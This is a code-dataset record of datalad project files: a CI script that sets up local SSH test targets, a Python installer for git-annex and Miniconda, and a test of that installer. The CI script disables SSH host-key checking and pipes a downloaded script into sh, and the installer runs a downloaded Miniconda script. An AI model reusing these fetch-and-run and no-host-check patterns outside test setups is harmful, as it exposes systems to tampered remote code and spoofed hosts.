bf53a532810d49eb35809f079f46c78de9a406f7
refs/heads/master
2021-08-18T02:51:53.091271
2021-01-09T09:33:40
2021-01-09T09:33:40
241,991,640
0
0
NOASSERTION
2020-02-20T21:16:50
2020-02-20T19:33:32
2020-02-20T20:14:36
null
[ { "alpha_fraction": 0.6818727254867554, "alphanum_fraction": 0.7106842994689941, "avg_line_length": 17.93181800842285, "blob_id": "9addabf69ac05dbf98eba9122f4a43a6e8ff0a61", "content_id": "bf5e0f65196fd0060328bf921d38d4ede32e99b7", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 833, "license_type": "permissive", "max_line_length": 86, "num_lines": 44, "path": "/tools/ci/prep-travis-forssh.sh", "repo_name": "djarecka/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nmkdir -p \"$HOME/.ssh\"\n\ncat >>\"$HOME/.ssh/config\" <<'EOF'\n\nHost datalad-test\nHostName localhost\nPort 42241\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\ncat >>\"$HOME/.ssh/config\" <<'EOF'\n\nHost datalad-test2\nHostName localhost\nPort 42242\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\nls -l \"$HOME/.ssh\"\nchmod go-rwx -R \"$HOME/.ssh\"\nls -ld \"$HOME/.ssh\"\nls -l \"$HOME/.ssh\"\n\nssh-keygen -f /tmp/dl-test-ssh-id -N \"\"\n\ncurl -fSsL \\\n https://raw.githubusercontent.com/datalad-tester/docker-ssh-target/master/setup \\\n >setup-docker-ssh\nsh setup-docker-ssh --key=/tmp/dl-test-ssh-id.pub -2 \\\n --from=dataladtester/docker-ssh-target:latest\n\nuntil nc -vz localhost 42241 && nc -vz localhost 42242\ndo sleep 1\ndone\n\nssh -v datalad-test exit\nssh -v datalad-test2 exit\n" }, { "alpha_fraction": 0.5749207735061646, "alphanum_fraction": 0.5769085884094238, "avg_line_length": 38.185264587402344, "blob_id": "5c249ccdc23158b288f169d8ec2b0a65fdc22b72", "content_id": "9bced015bb4970d79fe6e9aee5fb2e8bbd5d47cd", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18613, "license_type": "permissive", "max_line_length": 99, "num_lines": 475, "path": "/datalad/install.py", "repo_name": "djarecka/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n__python_requires__ = \"~= 3.6\"\nimport argparse\nimport json\nimport logging\nimport os\nimport os.path\nfrom pathlib import Path\nimport platform\nfrom shlex import quote\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom urllib.request import Request, urlopen\nfrom zipfile import ZipFile\n\nlog = logging.getLogger(\"datalad.install\")\n\n\ndef main():\n logging.basicConfig(\n format=\"%(asctime)s [%(levelname)-8s] %(name)s %(message)s\",\n datefmt=\"%Y-%m-%dT%H:%M:%S%z\",\n level=logging.INFO,\n )\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--adjust-bashrc\",\n action=\"store_true\",\n help=\"If the scheme tweaks PATH, prepend a snippet to ~/.bashrc that exports that path.\",\n )\n parser.add_argument(\n \"-E\",\n \"--env-write-file\",\n help=\"Write modified environment variables to this file\",\n )\n schemata = parser.add_subparsers(\n title=\"schema\",\n dest=\"schema\",\n description='Type of git-annex installation (default \"conda-forge\")',\n )\n schemata.add_parser(\"autobuild\", help=\"Linux, macOS only\")\n schemata.add_parser(\"brew\", help=\"macOS only\")\n scm_conda_forge = schemata.add_parser(\"conda-forge\", help=\"Linux, macOS only\")\n scm_conda_forge.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_conda_forge.add_argument(\"--path-miniconda\")\n scm_conda_forge.add_argument(\"version\", nargs=\"?\")\n scm_conda_forge_last = schemata.add_parser(\n \"conda-forge-last\", help=\"Linux, macOS only\"\n )\n scm_conda_forge_last.add_argument(\"-b\", \"--batch\", 
action=\"store_true\")\n scm_conda_forge_last.add_argument(\"--path-miniconda\")\n scm_conda_forge_last.add_argument(\"version\", nargs=\"?\")\n schemata.add_parser(\"datalad-git-annex-build\", help=\"Linux, macOS only\")\n scm_deb_url = schemata.add_parser(\"deb-url\", help=\"Linux only\")\n scm_deb_url.add_argument(\"url\")\n schemata.add_parser(\"neurodebian\", help=\"Linux only\")\n schemata.add_parser(\"neurodebian-devel\", help=\"Linux only\")\n schemata.add_parser(\"snapshot\", help=\"Linux, macOS only\")\n scm_miniconda = schemata.add_parser(\n \"miniconda\", help=\"Install just Miniconda; Linux, macOS only\"\n )\n scm_miniconda.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_miniconda.add_argument(\"--path-miniconda\")\n scm_datalad = schemata.add_parser(\n \"datalad\", help=\"Install Datalad via Miniconda; Linux, macOS only\"\n )\n scm_datalad.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_datalad.add_argument(\"--path-miniconda\")\n args = parser.parse_args()\n if args.env_write_file is not None:\n with open(args.env_write_file, \"w\"):\n # Force file to exist and start out empty\n pass\n installer = GitAnnexInstaller(\n adjust_bashrc=args.adjust_bashrc, env_write_file=args.env_write_file,\n )\n if args.schema is None:\n installer.install_via_conda_forge()\n elif args.schema == \"autobuild\":\n installer.install_via_autobuild()\n elif args.schema == \"brew\":\n installer.install_via_brew()\n elif args.schema == \"conda-forge\":\n installer.install_via_conda_forge(\n args.version, miniconda_path=args.path_miniconda, batch=args.batch\n )\n elif args.schema == \"conda-forge-last\":\n installer.install_via_conda_forge_last(\n args.version, miniconda_path=args.path_miniconda, batch=args.batch\n )\n elif args.schema == \"datalad-git-annex-build\":\n installer.install_via_datalad_git_annex_build()\n elif args.schema == \"deb-url\":\n installer.install_via_deb_url(args.url)\n elif args.schema == \"neurodebian\":\n installer.install_via_neurodebian()\n elif args.schema == \"neurodebian-devel\":\n installer.install_via_neurodebian_devel()\n elif args.schema == \"snapshot\":\n installer.install_via_snapshot()\n elif args.schema == \"miniconda\":\n miniconda_path = args.path_miniconda\n if miniconda_path is None:\n miniconda_path = os.path.join(tempfile.mkdtemp(prefix=\"ga-\"), \"miniconda\")\n installer.install_miniconda(miniconda_path, batch=args.batch)\n elif args.schema == \"datalad\":\n miniconda_path = args.path_miniconda\n if miniconda_path is None:\n miniconda_path = os.path.join(tempfile.mkdtemp(prefix=\"ga-\"), \"miniconda\")\n installer.install_datalad(miniconda_path, batch=args.batch)\n else:\n raise RuntimeError(f\"Invalid schema: {args.schema}\")\n\n\nclass GitAnnexInstaller:\n def __init__(self, adjust_bashrc=False, env_write_file=None):\n self.pathline = None\n self.annex_bin = \"/usr/bin\"\n self.adjust_bashrc = adjust_bashrc\n if env_write_file is None:\n self.env_write_file = None\n else:\n self.env_write_file = Path(env_write_file)\n\n def addpath(self, p, last=False):\n if self.pathline is not None:\n raise RuntimeError(\"addpath() called more than once\")\n if not last:\n newpath = f'{quote(p)}:\"$PATH\"'\n else:\n newpath = f'\"$PATH\":{quote(p)}'\n self.pathline = f\"export PATH={newpath}\"\n if self.env_write_file is not None:\n with self.env_write_file.open(\"a\") as fp:\n print(self.pathline, file=fp)\n\n def install_via_neurodebian(self):\n # TODO: use nd_freeze_install for an arbitrary version specified\n # we assume neurodebian is 
generally configured\n subprocess.run(\n [\"sudo\", \"apt-get\", \"install\", \"git-annex-standalone\"], check=True,\n )\n self.post_install()\n\n def install_via_neurodebian_devel(self):\n # if debian-devel is not setup -- set it up\n r = subprocess.run(\n [\"apt-cache\", \"policy\", \"git-annex-standalone\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n if \"/debian-devel \" not in r.stdout:\n # configure\n with open(\"/etc/apt/sources.list.d/neurodebian.sources.list\") as fp:\n srclist = fp.read()\n srclist = srclist.replace(\"/debian \", \"/debian-devel \")\n subprocess.run(\n [\n \"sudo\",\n \"tee\",\n \"/etc/apt/sources.list.d/neurodebian-devel.sources.list\",\n ],\n input=srclist,\n universal_newlines=True,\n check=True,\n )\n subprocess.run([\"sudo\", \"apt-get\", \"update\"], check=True)\n # check versions\n # devel:\n r = subprocess.run(\n [\"apt-cache\", \"policy\", \"git-annex-standalone\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n policy = r.stdout\n devel_annex_version = None\n current_annex_version = None\n prev = None\n for line in policy.splitlines():\n if \"/debian-devel \" in line:\n assert prev is not None\n if \"ndall\" in prev:\n assert devel_annex_version is None\n devel_annex_version = prev.split()[0]\n if \"***\" in line:\n assert current_annex_version is None\n current_annex_version = line.split()[1]\n prev = line\n assert devel_annex_version is not None, \"Could not find devel annex version\"\n if current_annex_version is None or (\n subprocess.run(\n [\n \"dpkg\",\n \"--compare-versions\",\n devel_annex_version,\n \"gt\",\n current_annex_version,\n ]\n ).returncode\n == 0\n ):\n subprocess.run(\n [\n \"sudo\",\n \"apt-get\",\n \"install\",\n f\"git-annex-standalone={devel_annex_version}\",\n ],\n check=True,\n )\n else:\n log.info(\n \"devel version %s is not newer than installed %s\",\n devel_annex_version,\n current_annex_version,\n )\n self.post_install()\n\n def install_via_deb_url(self, url):\n with tempfile.TemporaryDirectory() as tmpdir:\n debpath = os.path.join(tmpdir, \"git-annex.deb\")\n download_file(url, debpath)\n subprocess.run([\"sudo\", \"dpkg\", \"-i\", debpath], check=True)\n self.post_install()\n\n def install_via_autobuild(self):\n systype = platform.system()\n if systype == \"Linux\":\n self._install_via_autobuild_or_snapshot_linux(\"autobuild/amd64\")\n elif systype == \"Darwin\":\n self._install_via_autobuild_or_snapshot_macos(\n \"autobuild/x86_64-apple-yosemite\"\n )\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n\n def install_via_snapshot(self):\n systype = platform.system()\n if systype == \"Linux\":\n self._install_via_autobuild_or_snapshot_linux(\"linux/current\")\n elif systype == \"Darwin\":\n self._install_via_autobuild_or_snapshot_macos(\"OSX/current/10.10_Yosemite\")\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n\n def _install_via_autobuild_or_snapshot_linux(self, subpath):\n tmpdir = tempfile.mkdtemp(prefix=\"ga-\")\n self.annex_bin = os.path.join(tmpdir, \"git-annex.linux\")\n log.info(\"downloading and extracting under %s\", self.annex_bin)\n gzfile = os.path.join(tmpdir, \"git-annex-standalone-amd64.tar.gz\")\n download_file(\n f\"https://downloads.kitenet.net/git-annex/{subpath}/git-annex-standalone-amd64.tar.gz\",\n gzfile,\n )\n subprocess.run([\"tar\", \"-C\", tmpdir, \"-xzf\", gzfile], check=True)\n self.addpath(self.annex_bin)\n self.post_install()\n\n def _install_via_autobuild_or_snapshot_macos(self, subpath):\n with 
tempfile.TemporaryDirectory() as tmpdir:\n dmgpath = os.path.join(tmpdir, \"git-annex.dmg\")\n download_file(\n f\"https://downloads.kitenet.net/git-annex/{subpath}/git-annex.dmg\",\n dmgpath,\n )\n self._install_from_dmg(dmgpath)\n self.post_install()\n\n def install_via_conda_forge(self, version=None, miniconda_path=None, batch=False):\n tmpdir = tempfile.mkdtemp(prefix=\"ga-\")\n self.annex_bin = os.path.join(tmpdir, \"annex-bin\")\n self.addpath(self.annex_bin)\n self._install_via_conda(version, tmpdir, miniconda_path, batch)\n\n def install_via_conda_forge_last(\n self, version=None, miniconda_path=None, batch=False\n ):\n tmpdir = tempfile.mkdtemp(prefix=\"ga-\")\n self.annex_bin = os.path.join(tmpdir, \"annex-bin\")\n if shutil.which(\"git-annex\") is not None:\n log.warning(\n \"git annex already installed. In this case this setup has no sense\"\n )\n sys.exit(1)\n # We are interested only to get git-annex into our environment\n # So as to not interfere with \"system wide\" Python etc, we will add\n # miniconda at the end of the path\n self.addpath(self.annex_bin, last=True)\n self._install_via_conda(version, tmpdir, miniconda_path, batch)\n\n def _install_via_conda(self, version, tmpdir, miniconda_path=None, batch=False):\n if miniconda_path is None:\n miniconda_path = os.path.join(tmpdir, \"miniconda\")\n conda_bin = os.path.join(miniconda_path, \"bin\")\n # We will symlink git-annex only under a dedicated directory, so it could be\n # used with default Python etc. If names changed here, possibly adjust\n # hardcoded duplicates below where we establish relative symlinks.\n self.install_miniconda(miniconda_path, batch=batch)\n subprocess.run(\n [\n os.path.join(conda_bin, \"conda\"),\n \"install\",\n \"-q\",\n \"-c\",\n \"conda-forge\",\n \"-y\",\n f\"git-annex={version}\" if version is not None else \"git-annex\",\n ],\n check=True,\n )\n if self.annex_bin != conda_bin:\n annex_bin = Path(self.annex_bin)\n annex_bin.mkdir(parents=True, exist_ok=True)\n for p in Path(conda_bin).glob(\"git-annex*\"):\n (annex_bin / p.name).symlink_to(p.resolve())\n self.post_install()\n\n def install_miniconda(self, miniconda_path, batch=False):\n systype = platform.system()\n if systype == \"Linux\":\n miniconda_script = \"Miniconda3-latest-Linux-x86_64.sh\"\n elif systype == \"Darwin\":\n miniconda_script = \"Miniconda3-latest-MacOSX-x86_64.sh\"\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n log.info(\"Downloading and running miniconda installer\")\n with tempfile.TemporaryDirectory() as tmpdir:\n script_path = os.path.join(tmpdir, miniconda_script)\n download_file(\n (\n os.environ.get(\"ANACONDA_URL\")\n or \"https://repo.anaconda.com/miniconda/\"\n )\n + miniconda_script,\n script_path,\n )\n log.info(\"Installing miniconda in %s\", miniconda_path)\n args = [\"-p\", str(miniconda_path), \"-s\"]\n if batch:\n args.append(\"-b\")\n subprocess.run([\"bash\", script_path] + args, check=True)\n\n def install_datalad(self, miniconda_path, batch=False):\n self.install_miniconda(miniconda_path, batch)\n subprocess.run(\n [\n os.path.join(miniconda_path, \"bin\", \"conda\"),\n \"install\",\n \"-q\",\n \"-c\",\n \"conda-forge\",\n \"-y\",\n \"datalad\",\n ],\n check=True,\n )\n\n def install_via_datalad_git_annex_build(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n systype = platform.system()\n if systype == \"Linux\":\n download_latest_git_annex(\"ubuntu\", tmpdir)\n (debpath,) = Path(tmpdir).glob(\"*.deb\")\n subprocess.run([\"sudo\", \"dpkg\", \"-i\", str(debpath)], 
check=True)\n elif systype == \"Darwin\":\n download_latest_git_annex(\"macos\", tmpdir)\n (dmgpath,) = Path(tmpdir).glob(\"*.dmg\")\n self._install_from_dmg(dmgpath)\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n self.post_install()\n\n def install_via_brew(self):\n subprocess.run([\"brew\", \"install\", \"git-annex\"], check=True)\n self.annex_bin = \"/usr/local/bin\"\n self.post_install()\n\n def _install_from_dmg(self, dmgpath):\n subprocess.run([\"hdiutil\", \"attach\", str(dmgpath)], check=True)\n subprocess.run(\n [\"rsync\", \"-a\", \"/Volumes/git-annex/git-annex.app\", \"/Applications/\"],\n check=True,\n )\n subprocess.run([\"hdiutil\", \"detach\", \"/Volumes/git-annex/\"], check=True)\n self.annex_bin = \"/Applications/git-annex.app/Contents/MacOS\"\n self.addpath(self.annex_bin)\n\n def post_install(self):\n if self.adjust_bashrc and self.pathline is not None:\n # If PATH was changed, we need to make it available to SSH commands.\n # Note: Prepending is necessary. SSH commands load .bashrc, but many\n # distributions (including Debian and Ubuntu) come with a snippet\n # to exit early in that case.\n bashrc = Path.home() / \".bashrc\"\n contents = bashrc.read_text()\n bashrc.write_text(self.pathline + \"\\n\" + contents)\n log.info(\"Adjusted first line of ~/.bashrc:\")\n log.info(\"%s\", self.pathline)\n # Rudimentary test of installation and inform user about location\n for binname in [\"git-annex\", \"git-annex-shell\"]:\n if not os.access(os.path.join(self.annex_bin, binname), os.X_OK):\n raise RuntimeError(f\"Cannot execute {binname}\")\n log.info(\"git-annex is available under %r\", self.annex_bin)\n\n\ndef download_file(url, path, headers=None):\n if headers is None:\n headers = {}\n req = Request(url, headers=headers)\n with urlopen(req) as r:\n with open(path, \"wb\") as fp:\n shutil.copyfileobj(r, fp)\n\n\ndef download_latest_git_annex(ostype, target_path: Path):\n repo = \"datalad/git-annex\"\n branch = \"master\"\n workflow = f\"build-{ostype}.yaml\"\n token = os.environ.get(\"GITHUB_TOKEN\")\n if not token:\n r = subprocess.run(\n [\"git\", \"config\", \"hub.oauthtoken\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n )\n if r.returncode != 0 or not r.stdout.strip():\n raise RuntimeError(\n \"GitHub OAuth token not set. 
Set via GITHUB_TOKEN environment\"\n \" variable or hub.oauthtoken Git config option.\"\n )\n token = r.stdout.strip()\n\n def apicall(url):\n req = Request(url, headers={\"Authorization\": f\"Bearer {token}\"})\n with urlopen(req) as r:\n return json.load(r)\n\n jobs_url = (\n f\"https://api.github.com/repos/{repo}/actions/workflows/{workflow}/runs\"\n f\"?status=success&branch={branch}\"\n )\n log.info(\"Getting artifacts_url from %s\", jobs_url)\n jobs = apicall(jobs_url)\n try:\n artifacts_url = jobs[\"workflow_runs\"][0][\"artifacts_url\"]\n except LookupError:\n log.exception(\"Unable to get artifacts_url\")\n raise\n log.info(\"Getting archive download URL from %s\", artifacts_url)\n artifacts = apicall(artifacts_url)\n if artifacts[\"total_count\"] < 1:\n raise RuntimeError(\"No artifacts found!\")\n elif artifacts[\"total_count\"] > 1:\n raise RuntimeError(\"Too many artifacts found!\")\n else:\n archive_download_url = artifacts[\"artifacts\"][0][\"archive_download_url\"]\n log.info(\"Downloading artifact package from %s\", archive_download_url)\n target_path.mkdir(parents=True, exist_ok=True)\n artifact_path = target_path / \".artifact.zip\"\n download_file(\n archive_download_url,\n artifact_path,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n with ZipFile(str(artifact_path)) as zipf:\n zipf.extractall(str(target_path))\n artifact_path.unlink()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5904255509376526, "alphanum_fraction": 0.5904255509376526, "avg_line_length": 25.11111068725586, "blob_id": "5ac1cc0ffc5b46a5f24b3f90f79c2e9f6b196555", "content_id": "9c56b6c864851d7b60c51c4abce69cea89caa5c0", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 940, "license_type": "permissive", "max_line_length": 92, "num_lines": 36, "path": "/datalad/tests/test_install.py", "repo_name": "djarecka/datalad", "src_encoding": "UTF-8", "text": "import os.path\nfrom pathlib import Path\nimport subprocess\nimport sys\nfrom .utils import (\n assert_in,\n skip_if_on_windows,\n turtle,\n with_tempfile,\n)\n\n\n@turtle\n@skip_if_on_windows # all development for this functionality is moving to datalad-installer\n@with_tempfile(mkdir=True)\ndef test_install_miniconda(tmpdir):\n miniconda_path = os.path.join(tmpdir, \"conda\")\n subprocess.run(\n [\n sys.executable,\n os.path.join(\"datalad\", \"install.py\"),\n \"miniconda\",\n \"--batch\",\n \"--path-miniconda\",\n miniconda_path,\n ],\n cwd=Path(__file__).resolve().parent.parent.parent,\n check=True,\n )\n r = subprocess.run(\n [os.path.join(miniconda_path, \"bin\", \"conda\"), \"create\", \"-n\", \"test\", \"-y\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n assert_in(\"conda activate test\", r.stdout)\n" } ]
3
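A reusable piece inside the datalad record above is download_latest_git_annex in install.py: it queries the GitHub Actions REST API with a Bearer token, takes the artifacts_url of the newest successful workflow run, and then downloads the artifact archive. The following is a stripped-down sketch of just the API lookup, assuming GITHUB_TOKEN is set in the environment; the repo, workflow, and branch names are the ones hardcoded in the file above.

~~~python
# Stripped-down sketch of the GitHub Actions lookup in install.py:
# list successful runs of a workflow, then read the newest run's
# artifacts_url. GITHUB_TOKEN is assumed to be set in the environment.
import json
import os
from urllib.request import Request, urlopen

token = os.environ["GITHUB_TOKEN"]


def apicall(url):
    # Bearer-authenticated GET returning parsed JSON, mirroring install.py.
    req = Request(url, headers={"Authorization": f"Bearer {token}"})
    with urlopen(req) as r:
        return json.load(r)


runs = apicall(
    "https://api.github.com/repos/datalad/git-annex/actions/workflows/"
    "build-ubuntu.yaml/runs?status=success&branch=master"
)
artifacts_url = runs["workflow_runs"][0]["artifacts_url"]
artifacts = apicall(artifacts_url)
print(artifacts["total_count"], "artifact(s) in the latest successful run")
~~~

install.py then fetches the returned archive_download_url with the same Bearer header and unpacks it with ZipFile; raising an error when zero or multiple artifacts are found, as the original code does, keeps the install deterministic.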
nhanpotter/NTU-FoodBeverage
https://github.com/nhanpotter/NTU-FoodBeverage
f8d811edffd1028da73a55408744b2ef70be6225
afb3e0803170b3405fa9c581562cdde3e3fc782e
593968ff471571dc0ecb6ccc39abd1ed70a60980
refs/heads/master
2020-04-19T18:46:02.314405
2019-01-30T16:18:25
2019-01-30T16:18:25
168,371,729
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4804449677467346, "alphanum_fraction": 0.5123085379600525, "avg_line_length": 49.25837707519531, "blob_id": "356e491fb77e082da53e307dcbb507f279351b01", "content_id": "745a1024137a60fc3f13b829a59d6ce095c91df4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56993, "license_type": "no_license", "max_line_length": 225, "num_lines": 1134, "path": "/main_project.py", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "import pygame\nimport pickle\nimport datetime\nimport time\nimport sys, math\nfrom shortest_distance import shortest_path\nfrom sort_and_search import *\n\n###define constants, colors, ...\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGREEN = (0, 255, 0)\nGREY = (200, 200, 200)\nBROWN = (255, 248, 220)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\nFPS = 60\nWIDTH = WIDTH_INIT = 1200\nHEIGHT = HEIGHT_INIT = 800\nBLIT_X = 0\nBLIT_Y = 0\nSTEP = 40\nRATIO = 1.3\n###load image and music\nwindow_surface = pygame.display.set_mode((WIDTH_INIT, HEIGHT_INIT))\noriginal_image = pygame.image.load(\"NTUmap.png\")\nimage = pygame.transform.scale(original_image, (WIDTH, HEIGHT))\ntick_image = pygame.image.load(\"tick.png\")\n\n###initialize pygame and create window\nclock = pygame.time.Clock()\npygame.init()\n\n\n###class of objects\n# Foodcourt (including stall)\nclass FoodCourt:\n\n # initialise\n def __init__(self, name, address, number):\n self.name = name # arguments to set all the instance variables\n self.address = address\n self.number = number\n self.stall_list = []\n\n def addStall(self, stall_name, category, aircon_availability, address, wkday_op_time, wkday_cl_time, wkend_op_time,\n wkend_cl_time):\n s = Stall(stall_name, category, aircon_availability, address, wkday_op_time, wkday_cl_time, wkend_op_time,\n wkend_cl_time)\n self.stall_list.append(s) # stalls added into FoodCourt obj (Stall obj belongs to FoodCourt obj)\n\n def addFood(self, stall_name, food_name, price, rating):\n found = False # to ensure that stall name is added in the correct format (Can prevent typos etc)\n for s_name in self.stall_list:\n if (s_name.name == stall_name):\n found = True\n break\n if found == False:\n print(\"ERROR : Stall not found, unable to add\", food_name, \"in\", stall_name)\n return\n\n try: # to ensure that price and rating of the food are added in the correct format (ie. 
price cannot be negative, ratings cannot be more than 5)\n if price > 0 and (rating > 0 and rating <= 5):\n for stall in self.stall_list:\n if stall.name == stall_name:\n stall.addFood(food_name, price,\n rating) # Procedural abstraction: Only need to call this function (addFood) to add the food, the FoodCourt class does not need to know how the Stall class implements the addFood function\n else:\n raise ValueError\n except ValueError:\n\n print(\"ERROR : Couldn't add\", food_name, \"to\", stall_name, \"with price\", price)\n\n def searchFoodByName(self, food_name):\n __searchResultList = []\n for stall in self.stall_list:\n list1 = stall.searchFoodByName(food_name) # this result is returned from the function in Stall object\n for food in list1:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n # for each of the result from the Stall object, a dict will be created\n \"Food Name\": food.name,\n \"Price\": food.price,\n \"Rating\": food.rating,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def searchByPrice(self, min, max):\n __searchResultList = []\n for stall in self.stall_list:\n list1 = stall.searchByPrice(min, max) # this result is returned from the function in Stall object\n for food in list1:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Food Name\": food.name,\n \"Price\": food.price,\n \"Rating\": food.rating,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def searchByCategory(self, user_food_category):\n __searchResultList = []\n for stall in self.stall_list:\n food_belongs_to_cat = stall.checkIfBelongToCategory(\n user_food_category) # this result is returned from the function in Stall object\n if food_belongs_to_cat == True:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Category\": stall.category,\n \"Address\": stall.address,\n \"Contact Number\": self.number,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def getStalls(self):\n __searchResultList = []\n for stall in self.stall_list:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Category\": stall.category,\n \"Address\": stall.address,\n \"Contact Number\": self.number,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def searchByAirconAvailability(self, user_aircon):\n __searchResultList = []\n for stall in self.stall_list: # goes thru all the stalls in the stall list and returns a 
dict of stalls with aircon or no aircon (based on input from user_aircon)\n if stall.aircon_availability.lower() == user_aircon:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def getStallByName(self, sname):\n __searchResultList = []\n for stall in self.stall_list:\n if sname.lower() in stall.name.lower():\n __searchResultList.append(stall)\n return __searchResultList\n\n\n# Stall (including Food)\nclass Stall:\n\n # intialise\n def __init__(self, name, category, aircon_availability, address, wkday_op_time, wkday_cl_time, wkend_op_time,\n wkend_cl_time):\n self.name = name\n self.category = category\n self.address = address\n self.aircon_availability = aircon_availability\n self.wkday_op_time = wkday_op_time\n self.wkday_cl_time = wkday_cl_time\n self.wkend_op_time = wkend_op_time\n self.wkend_cl_time = wkend_cl_time\n self.food_list = []\n\n def addFood(self, name, price, rating):\n f = Food(name, price, rating) # from Food object bc Food obj belongs to Stall obj\n self.food_list.append(f)\n\n def checkIfBelongToCategory(self, user_input_category):\n splitted_category = self.category.split(\",\") # split the categories in 1 food\n splitted_user_category = user_input_category.split(\n \",\") # split the categories that the user inputted (user has to input in x,y format when searchng by categories)\n no_of_matches = len(splitted_user_category)\n for user_cat in splitted_user_category:\n for category in splitted_category:\n if category.strip().lower() == user_cat.strip().lower():\n no_of_matches -= 1\n break\n\n if no_of_matches == 0:\n return True\n else:\n return False\n\n def time_in_range(self, start, end, x):\n # \"\"\"Return true if x is in the range [start, end]\"\"\"\n if start <= end:\n return start <= x <= end\n else:\n return start <= x or x <= end\n\n def getStallStatus(self):\n # Compare the time here and return open or close\n splitted_wkday_op_time = self.wkday_op_time.split(\":\")\n splitted_wkday_cl_time = self.wkday_cl_time.split(\":\")\n wkday_op_hour_int = int(splitted_wkday_op_time[0])\n wkday_op_min_int = int(splitted_wkday_op_time[1])\n wkday_cl_hour_int = int(splitted_wkday_cl_time[0])\n wkday_cl_min_int = int(splitted_wkday_cl_time[1])\n\n splitted_wkend_op_time = self.wkend_op_time.split(\":\")\n splitted_wkend_cl_time = self.wkend_cl_time.split(\":\")\n wkend_op_hour_int = int(splitted_wkend_op_time[0])\n wkend_op_min_int = int(splitted_wkend_op_time[1])\n wkend_cl_hour_int = int(splitted_wkend_cl_time[0])\n wkend_cl_min_int = int(splitted_wkend_cl_time[1])\n\n current_hour = datetime.datetime.now().hour\n current_min = datetime.datetime.now().minute\n current_wkday = datetime.datetime.today().weekday()\n\n if current_wkday in range(0, 5):\n start = datetime.time(wkday_op_hour_int, wkday_op_min_int, 0)\n end = datetime.time(wkday_cl_hour_int, wkday_cl_min_int, 0)\n stall_opening = self.time_in_range(start, end, datetime.time(current_hour, current_min, 0))\n if stall_opening == True:\n return (\"OPEN\")\n else:\n return (\"CLOSED\")\n\n elif current_wkday in range(5, 7):\n start = datetime.time(wkend_op_hour_int, wkend_op_min_int, 0)\n end = datetime.time(wkend_cl_hour_int, wkend_cl_min_int, 0)\n stall_opening 
